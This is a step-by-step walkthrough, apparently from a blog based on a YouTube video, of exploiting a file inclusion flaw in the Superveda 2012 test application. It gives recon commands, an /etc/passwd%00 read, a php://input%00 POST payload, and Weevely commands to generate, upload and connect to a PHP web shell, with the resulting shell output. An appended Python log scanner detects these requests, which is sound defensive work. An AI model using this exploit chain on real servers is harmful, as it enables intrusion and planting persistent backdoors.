Wubi

From LFI to PHP Shell using Burp Suite and Weevely (Superveda 2012)

From LFI to remote code execution with a php://input POST request (Superveda 2012 test application):

Tools:
Netdiscover
nmap
Burp Suite
Weevely tiny web shell
Firefox

Attacker ip addr : 192.168.42.130
netdiscover -r 192.168.42.0
nmap -sS -sV -p 80 192.168.42.132
firefox 192.168.42.132
192.168.42.132/pressreleases/showPressRelease.php?releaseID=/etc/passwd%00
open burp
Use repeater to post request :
POST /pressreleases/showPressRelease.php?releaseID=php://input%00 HTTP/1.1

Create php shell:
cd /pentest/web/backdoors/weevely/
./weevely.py generate mypass /var/www/shell.txt

Upload shell with burp post request:
POST /pressreleases/showPressRelease.php?releaseID=php://input%00 HTTP/1.1

Connect to shell:
./weevely.py http://192.168.42.132/pressreleases/shell.php mypass

apache@localhost.localdomain:/var/www/html/pressreleases$ ls
1.php
2.php
3.php
default.php
index.php
shell.php
showPressRelease.php
thumbs
apache@localhost.localdomain:/var/www/html/pressreleases$


Source: YouTube
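
For defenders, the requests in this post leave clear traces in the web server access log: a file path or a php:// stream wrapper in the releaseID parameter, terminated by a %00 null byte. The following is an added example, not part of the original post, that flags those traces; the log lines are constructed samples in Apache access-log format, and the repeated decoding (which also covers a double-encoded %2500) goes slightly beyond the requests shown above.

```python
import re
from urllib.parse import unquote

# Request and status fields of an Apache combined/common access-log line.
REQ = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# URL-style stream wrappers that should never appear in a file-name parameter.
WRAPPER = re.compile(r"^(php|data|expect|file|zip|phar|https?|ftp)://", re.I)

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so %2500 is seen as the NUL byte it becomes."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_line(line):
    """Return sorted (parameter, reason) findings for one log line."""
    m = REQ.search(line)
    if not m:
        return []
    _, _, query = m["target"].partition("?")
    findings = set()
    for pair in filter(None, query.split("&")):
        name, _, raw = pair.partition("=")
        value = fully_decode(raw)
        if "\x00" in value:
            findings.add((name, "null byte"))
        if WRAPPER.match(value):
            findings.add((name, "stream wrapper"))
        if value.startswith("/") or "../" in value:
            findings.add((name, "file path"))
    return sorted(findings)

def scan(lines):
    """Map the index of each flagged line to its findings."""
    return {i: f for i, line in enumerate(lines) if (f := inspect_line(line))}

# Constructed sample log lines (not taken from a real server).
P = '192.168.42.130 - - [10/Oct/2012:13:55:36 +0000] '
U = '/pressreleases/showPressRelease.php?releaseID='
SAMPLE = [
    P + '"GET ' + U + '2 HTTP/1.1" 200 512',
    P + '"GET ' + U + '/etc/passwd%00 HTTP/1.1" 200 1843',
    P + '"POST ' + U + 'php://input%00 HTTP/1.1" 200 97',
    P + '"POST ' + U + 'php://input%2500 HTTP/1.1" 200 97',
]

if __name__ == "__main__":
    for idx, found in scan(SAMPLE).items():
        print(idx, found)
```

The null byte only truncates the include path on old PHP versions, so a hit on "null byte" or "stream wrapper" in a file-name parameter is worth alerting on regardless of the response status.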